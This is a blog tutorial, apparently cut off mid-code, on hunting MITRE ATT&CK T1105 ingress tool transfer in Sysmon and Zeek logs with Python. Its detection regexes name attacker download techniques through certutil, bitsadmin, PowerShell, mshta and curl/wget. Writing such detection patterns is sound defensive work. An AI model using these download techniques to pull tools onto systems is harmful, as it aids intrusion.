Charles Givre Posted on May 31 • Originally published at gtkcyber.com Detecting Ingress Tool Transfer (T1105) with Python # cybersecurity # datascience # python # tutorial After initial access, attackers almost always need to pull more tooling onto the host: a beacon, a credential dumper, a tunneler. That step is Ingress Tool Transfer (T1105) in MITRE ATT&CK, and it is hard to catch with signatures because the transfer mechanisms are legitimate. certutil , bitsadmin , curl , and PowerShell all download files for normal reasons. The signal is in the combination and the rarity, not the binary itself. This is where a little data science beats another detection rule. Here is how to hunt T1105 in Python across three layers: the process command line, the process-to-network relationship, and the payload on the wire. Where T1105 Shows Up in Your Logs Three sources cover most of it: Sysmon Event ID 1 (process creation) for the download command line and parent process Sysmon Event ID 3 (network connection) to confirm the process actually reached out Zeek http.log (or proxy logs) for the file coming across the wire You can run all three as pandas DataFrames. No SIEM required, which matters when you are working an exported archive from a host you do not control. Catching LOLBin Downloaders in the Command Line Start with the living-off-the-land binaries attackers reach for. Load Sysmon Event ID 1 and flag the download patterns: import pandas as pd proc = pd . read_csv ( " sysmon_eid1.csv " ) # UtcTime, Image, CommandLine, ParentImage, ProcessGuid # Download patterns by LOLBin (see the LOLBAS project) patterns = { " certutil " : r " certutil.*(-urlcache|-f|-split).*http " , " bitsadmin " : r " bitsadmin.*(/transfer|/addfile) " , " powershell " : r " (downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer) " , " mshta " : r " mshta.*http " , " curl_wget " : r " \b(curl|wget)\b.*http " , } cmd = proc [ " CommandLine " ]. fillna ( "" ). str . lower () for
LIVE